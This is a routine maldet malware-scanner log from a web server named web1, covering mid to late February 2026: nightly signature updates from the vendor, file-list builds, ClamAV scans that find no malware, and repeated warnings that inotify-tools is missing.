Feb 15 2026 04:25:15 web1 maldet(936028): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (1073 files) in progress...
Feb 15 2026 04:25:41 web1 maldet(936028): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 1073, malware hits 0, cleaned hits 0, time 59s
Feb 15 2026 04:25:41 web1 maldet(936028): {scan} scan report saved, to view run: maldet --report 260215-0424.936028
Feb 16 2026 03:31:45 web1 maldet(1319144): {update} checking for available updates...
Feb 16 2026 03:31:45 web1 maldet(1319144): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 16 2026 03:31:45 web1 maldet(1319144): {update} hashing install files and checking against server...
Feb 16 2026 03:31:45 web1 maldet(1319144): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 16 2026 03:31:45 web1 maldet(1319144): {update} latest version already installed.
Feb 16 2026 03:31:45 web1 maldet(1319253): {sigup} performing signature update check...
Feb 16 2026 03:31:45 web1 maldet(1319253): {sigup} local signature set is version 202602131845305
Feb 16 2026 03:31:45 web1 maldet(1319253): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 16 2026 03:31:45 web1 maldet(1319253): {sigup} new signature set 202602163981045 available
Feb 16 2026 03:31:45 web1 maldet(1319253): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 16 2026 03:31:45 web1 maldet(1319253): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 16 2026 03:31:45 web1 maldet(1319253): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Feb 16 2026 03:31:45 web1 maldet(1319253): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 16 2026 03:31:45 web1 maldet(1319253): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 16 2026 03:31:45 web1 maldet(1319253): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Feb 16 2026 03:31:45 web1 maldet(1319253): {sigup} verified md5sum of maldet-sigpack.tgz
Feb 16 2026 03:31:46 web1 maldet(1319253): {sigup} unpacked and installed maldet-sigpack.tgz
Feb 16 2026 03:31:46 web1 maldet(1319253): {sigup} verified md5sum of maldet-clean.tgz
Feb 16 2026 03:31:46 web1 maldet(1319253): {sigup} unpacked and installed maldet-clean.tgz
Feb 16 2026 03:31:46 web1 maldet(1319253): {sigup} signature set update completed
Feb 16 2026 03:31:46 web1 maldet(1319253): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 16 2026 03:31:46 web1 maldet(1319456): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 16 2026 03:31:46 web1 maldet(1319456): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 16 2026 03:31:46 web1 maldet(1319456): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 16 2026 03:31:46 web1 maldet(1319456): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 16 2026 03:31:46 web1 maldet(1319456): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 16 2026 03:32:23 web1 maldet(1319456): {scan} file list completed in 37s, found 779 files...
Feb 16 2026 03:32:23 web1 maldet(1319456): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 16 2026 03:32:23 web1 maldet(1319456): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (779 files) in progress...
Feb 16 2026 03:32:46 web1 maldet(1319456): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 779, malware hits 0, cleaned hits 0, time 60s
Feb 16 2026 03:32:46 web1 maldet(1319456): {scan} scan report saved, to view run: maldet --report 260216-0331.1319456
Feb 16 2026 08:29:25 web1 maldet(1176): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 17 2026 03:37:26 web1 maldet(325312): {update} checking for available updates...
Feb 17 2026 03:37:26 web1 maldet(325312): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 17 2026 03:37:26 web1 maldet(325312): {update} hashing install files and checking against server...
Feb 17 2026 03:37:26 web1 maldet(325312): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 17 2026 03:37:26 web1 maldet(325312): {update} latest version already installed.
Feb 17 2026 03:37:26 web1 maldet(325426): {sigup} performing signature update check...
Feb 17 2026 03:37:26 web1 maldet(325426): {sigup} local signature set is version 202602163981045
Feb 17 2026 03:37:26 web1 maldet(325426): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 17 2026 03:37:26 web1 maldet(325426): {sigup} latest signature set already installed
Feb 17 2026 03:37:26 web1 maldet(325515): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 17 2026 03:37:27 web1 maldet(325515): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 17 2026 03:37:27 web1 maldet(325515): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 17 2026 03:37:27 web1 maldet(325515): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 17 2026 03:37:27 web1 maldet(325515): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 17 2026 03:38:02 web1 maldet(325515): {scan} file list completed in 35s, found 11314 files...
Feb 17 2026 03:38:02 web1 maldet(325515): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 17 2026 03:38:02 web1 maldet(325515): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (11314 files) in progress...
Feb 17 2026 03:40:01 web1 maldet(325515): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 11314, malware hits 0, cleaned hits 0, time 155s
Feb 17 2026 03:40:01 web1 maldet(325515): {scan} scan report saved, to view run: maldet --report 260217-0337.325515
Feb 17 2026 10:18:09 web1 maldet(1183): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 17 2026 18:11:04 web1 maldet(1163): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 18 2026 03:24:17 web1 maldet(190884): {update} checking for available updates...
Feb 18 2026 03:24:17 web1 maldet(190884): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 18 2026 03:24:17 web1 maldet(190884): {update} hashing install files and checking against server...
Feb 18 2026 03:24:17 web1 maldet(190884): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 18 2026 03:24:17 web1 maldet(190884): {update} latest version already installed.
Feb 18 2026 03:24:17 web1 maldet(190993): {sigup} performing signature update check...
Feb 18 2026 03:24:17 web1 maldet(190993): {sigup} local signature set is version 202602163981045
Feb 18 2026 03:24:17 web1 maldet(190993): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 18 2026 03:24:18 web1 maldet(190993): {sigup} latest signature set already installed
Feb 18 2026 03:24:18 web1 maldet(191081): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 18 2026 03:24:18 web1 maldet(191081): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 18 2026 03:24:18 web1 maldet(191081): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 18 2026 03:24:18 web1 maldet(191081): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 18 2026 03:24:18 web1 maldet(191081): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 18 2026 03:24:51 web1 maldet(191081): {scan} file list completed in 32s, found 18213 files...
Feb 18 2026 03:24:51 web1 maldet(191081): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 18 2026 03:24:51 web1 maldet(191081): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (18213 files) in progress...
Feb 18 2026 03:27:51 web1 maldet(191081): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 18213, malware hits 0, cleaned hits 0, time 213s
Feb 18 2026 03:27:51 web1 maldet(191081): {scan} scan report saved, to view run: maldet --report 260218-0324.191081
Feb 19 2026 03:27:37 web1 maldet(620799): {update} checking for available updates...
Feb 19 2026 03:27:37 web1 maldet(620799): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 19 2026 03:27:37 web1 maldet(620799): {update} hashing install files and checking against server...
Feb 19 2026 03:27:37 web1 maldet(620799): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 19 2026 03:27:37 web1 maldet(620799): {update} latest version already installed.
Feb 19 2026 03:27:37 web1 maldet(620908): {sigup} performing signature update check...
Feb 19 2026 03:27:37 web1 maldet(620908): {sigup} local signature set is version 202602163981045
Feb 19 2026 03:27:37 web1 maldet(620908): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 19 2026 03:27:37 web1 maldet(620908): {sigup} new signature set 202602193480447 available
Feb 19 2026 03:27:37 web1 maldet(620908): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 19 2026 03:27:37 web1 maldet(620908): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 19 2026 03:27:37 web1 maldet(620908): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Feb 19 2026 03:27:37 web1 maldet(620908): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 19 2026 03:27:37 web1 maldet(620908): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 19 2026 03:27:38 web1 maldet(620908): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Feb 19 2026 03:27:38 web1 maldet(620908): {sigup} verified md5sum of maldet-sigpack.tgz
Feb 19 2026 03:27:38 web1 maldet(620908): {sigup} unpacked and installed maldet-sigpack.tgz
Feb 19 2026 03:27:38 web1 maldet(620908): {sigup} verified md5sum of maldet-clean.tgz
Feb 19 2026 03:27:38 web1 maldet(620908): {sigup} unpacked and installed maldet-clean.tgz
Feb 19 2026 03:27:38 web1 maldet(620908): {sigup} signature set update completed
Feb 19 2026 03:27:38 web1 maldet(620908): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 19 2026 03:27:38 web1 maldet(621113): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 19 2026 03:27:38 web1 maldet(621113): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 19 2026 03:27:38 web1 maldet(621113): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 19 2026 03:27:38 web1 maldet(621113): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 19 2026 03:27:38 web1 maldet(621113): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 19 2026 03:28:15 web1 maldet(621113): {scan} file list completed in 37s, found 17270 files...
Feb 19 2026 03:28:15 web1 maldet(621113): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 19 2026 03:28:15 web1 maldet(621113): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (17270 files) in progress...
Feb 19 2026 03:30:25 web1 maldet(621113): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 17270, malware hits 0, cleaned hits 0, time 167s
Feb 19 2026 03:30:25 web1 maldet(621113): {scan} scan report saved, to view run: maldet --report 260219-0327.621113
Feb 19 2026 04:52:54 web1 maldet(1149): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 20 2026 04:05:12 web1 maldet(515807): {update} checking for available updates...
Feb 20 2026 04:05:12 web1 maldet(515807): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 20 2026 04:05:12 web1 maldet(515807): {update} hashing install files and checking against server...
Feb 20 2026 04:05:12 web1 maldet(515807): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 20 2026 04:05:13 web1 maldet(515807): {update} latest version already installed.
Feb 20 2026 04:05:13 web1 maldet(515934): {sigup} performing signature update check...
Feb 20 2026 04:05:13 web1 maldet(515934): {sigup} local signature set is version 202602193480447
Feb 20 2026 04:05:13 web1 maldet(515934): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 20 2026 04:05:13 web1 maldet(515934): {sigup} latest signature set already installed
Feb 20 2026 04:05:13 web1 maldet(516035): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 20 2026 04:05:13 web1 maldet(516035): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 20 2026 04:05:13 web1 maldet(516035): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 20 2026 04:05:13 web1 maldet(516035): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 20 2026 04:05:13 web1 maldet(516035): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 20 2026 04:05:53 web1 maldet(516035): {scan} file list completed in 40s, found 2798 files...
Feb 20 2026 04:05:53 web1 maldet(516035): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 20 2026 04:05:53 web1 maldet(516035): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (2798 files) in progress...
Feb 20 2026 04:06:51 web1 maldet(516035): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 2798, malware hits 0, cleaned hits 0, time 98s
Feb 20 2026 04:06:51 web1 maldet(516035): {scan} scan report saved, to view run: maldet --report 260220-0405.516035
Feb 20 2026 08:33:51 web1 maldet(1200): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 21 2026 03:58:42 web1 maldet(389056): {update} checking for available updates...
Feb 21 2026 03:58:42 web1 maldet(389056): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 21 2026 03:58:42 web1 maldet(389056): {update} hashing install files and checking against server...
Feb 21 2026 03:58:43 web1 maldet(389056): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 21 2026 03:58:43 web1 maldet(389056): {update} latest version already installed.
Feb 21 2026 03:58:43 web1 maldet(389166): {sigup} performing signature update check...
Feb 21 2026 03:58:43 web1 maldet(389166): {sigup} local signature set is version 202602193480447
Feb 21 2026 03:58:43 web1 maldet(389166): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 21 2026 03:58:43 web1 maldet(389166): {sigup} latest signature set already installed
Feb 21 2026 03:58:43 web1 maldet(389254): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 21 2026 03:58:44 web1 maldet(389254): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 21 2026 03:58:44 web1 maldet(389254): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 21 2026 03:58:44 web1 maldet(389254): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 21 2026 03:58:44 web1 maldet(389254): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 21 2026 03:59:27 web1 maldet(389254): {scan} file list completed in 43s, found 42238 files...
Feb 21 2026 03:59:27 web1 maldet(389254): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 21 2026 03:59:27 web1 maldet(389254): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (42238 files) in progress...
Feb 21 2026 04:16:42 web1 maldet(389254): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 42238, malware hits 0, cleaned hits 0, time 1079s
Feb 21 2026 04:16:42 web1 maldet(389254): {scan} scan report saved, to view run: maldet --report 260221-0358.389254
Feb 21 2026 17:13:50 web1 maldet(1220): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 22 2026 03:34:58 web1 maldet(220199): {update} checking for available updates...
Feb 22 2026 03:34:58 web1 maldet(220199): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 22 2026 03:34:58 web1 maldet(220199): {update} hashing install files and checking against server...
Feb 22 2026 03:34:59 web1 maldet(220199): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 22 2026 03:34:59 web1 maldet(220199): {update} latest version already installed.
Feb 22 2026 03:34:59 web1 maldet(220308): {sigup} performing signature update check...
Feb 22 2026 03:34:59 web1 maldet(220308): {sigup} local signature set is version 202602193480447
Feb 22 2026 03:34:59 web1 maldet(220308): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 22 2026 03:34:59 web1 maldet(220308): {sigup} new signature set 202602221122240 available
Feb 22 2026 03:34:59 web1 maldet(220308): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 22 2026 03:34:59 web1 maldet(220308): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 22 2026 03:34:59 web1 maldet(220308): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Feb 22 2026 03:34:59 web1 maldet(220308): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 22 2026 03:34:59 web1 maldet(220308): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 22 2026 03:34:59 web1 maldet(220308): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Feb 22 2026 03:34:59 web1 maldet(220308): {sigup} verified md5sum of maldet-sigpack.tgz
Feb 22 2026 03:34:59 web1 maldet(220308): {sigup} unpacked and installed maldet-sigpack.tgz
Feb 22 2026 03:34:59 web1 maldet(220308): {sigup} verified md5sum of maldet-clean.tgz
Feb 22 2026 03:34:59 web1 maldet(220308): {sigup} unpacked and installed maldet-clean.tgz
Feb 22 2026 03:34:59 web1 maldet(220308): {sigup} signature set update completed
Feb 22 2026 03:35:00 web1 maldet(220308): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 22 2026 03:35:00 web1 maldet(220522): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 22 2026 03:35:00 web1 maldet(220522): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 22 2026 03:35:00 web1 maldet(220522): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 22 2026 03:35:00 web1 maldet(220522): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 22 2026 03:35:00 web1 maldet(220522): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 22 2026 03:35:44 web1 maldet(220522): {scan} file list completed in 44s, found 43076 files...
Feb 22 2026 03:35:44 web1 maldet(220522): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 22 2026 03:35:44 web1 maldet(220522): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (43076 files) in progress...
Feb 22 2026 03:59:26 web1 maldet(220522): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 43076, malware hits 0, cleaned hits 0, time 1466s
Feb 22 2026 03:59:26 web1 maldet(220522): {scan} scan report saved, to view run: maldet --report 260222-0335.220522
Feb 23 2026 01:54:56 web1 maldet(1164): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 23 2026 03:58:19 web1 maldet(46418): {update} checking for available updates...
Feb 23 2026 03:58:19 web1 maldet(46418): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 23 2026 03:58:19 web1 maldet(46418): {update} hashing install files and checking against server...
Feb 23 2026 03:58:19 web1 maldet(46418): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 23 2026 03:58:19 web1 maldet(46418): {update} latest version already installed.
Feb 23 2026 03:58:19 web1 maldet(46533): {sigup} performing signature update check...
Feb 23 2026 03:58:19 web1 maldet(46533): {sigup} local signature set is version 202602221122240
Feb 23 2026 03:58:19 web1 maldet(46533): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 23 2026 03:58:19 web1 maldet(46533): {sigup} latest signature set already installed
Feb 23 2026 03:58:19 web1 maldet(46622): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 23 2026 03:58:20 web1 maldet(46622): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 23 2026 03:58:20 web1 maldet(46622): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 23 2026 03:58:20 web1 maldet(46622): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 23 2026 03:58:20 web1 maldet(46622): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 23 2026 03:59:06 web1 maldet(46622): {scan} file list completed in 46s, found 44769 files...
Feb 23 2026 03:59:06 web1 maldet(46622): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 23 2026 03:59:06 web1 maldet(46622): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (44769 files) in progress...
Feb 23 2026 04:20:41 web1 maldet(46622): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 44769, malware hits 0, cleaned hits 0, time 1342s
Feb 23 2026 04:20:41 web1 maldet(46622): {scan} scan report saved, to view run: maldet --report 260223-0358.46622
Feb 24 2026 04:20:34 web1 maldet(546071): {update} checking for available updates...
Feb 24 2026 04:20:34 web1 maldet(546071): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 24 2026 04:20:34 web1 maldet(546071): {update} hashing install files and checking against server...
Feb 24 2026 04:20:34 web1 maldet(546071): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 24 2026 04:20:34 web1 maldet(546071): {update} latest version already installed.
Feb 24 2026 04:20:34 web1 maldet(546183): {sigup} performing signature update check...
Feb 24 2026 04:20:34 web1 maldet(546183): {sigup} local signature set is version 202602221122240
Feb 24 2026 04:20:34 web1 maldet(546183): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 24 2026 04:20:34 web1 maldet(546183): {sigup} latest signature set already installed
Feb 24 2026 04:20:34 web1 maldet(546273): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 24 2026 04:20:34 web1 maldet(546273): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 24 2026 04:20:34 web1 maldet(546273): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 24 2026 04:20:34 web1 maldet(546273): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 24 2026 04:20:34 web1 maldet(546273): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 24 2026 04:21:08 web1 maldet(546273): {scan} file list completed in 34s, found 15675 files...
Feb 24 2026 04:21:08 web1 maldet(546273): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 24 2026 04:21:08 web1 maldet(546273): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (15675 files) in progress...
Feb 24 2026 04:26:24 web1 maldet(546273): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 15675, malware hits 0, cleaned hits 0, time 350s
Feb 24 2026 04:26:24 web1 maldet(546273): {scan} scan report saved, to view run: maldet --report 260224-0420.546273
Feb 24 2026 21:04:41 web1 maldet(1151): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 25 2026 04:11:25 web1 maldet(131164): {update} checking for available updates...
Feb 25 2026 04:11:26 web1 maldet(131164): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 25 2026 04:11:26 web1 maldet(131164): {update} hashing install files and checking against server...
Feb 25 2026 04:11:26 web1 maldet(131164): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 25 2026 04:11:26 web1 maldet(131164): {update} latest version already installed.
Feb 25 2026 04:11:26 web1 maldet(131274): {sigup} performing signature update check...
Feb 25 2026 04:11:26 web1 maldet(131274): {sigup} local signature set is version 202602221122240
Feb 25 2026 04:11:26 web1 maldet(131274): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 25 2026 04:11:26 web1 maldet(131274): {sigup} new signature set 202602253750710 available
Feb 25 2026 04:11:26 web1 maldet(131274): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
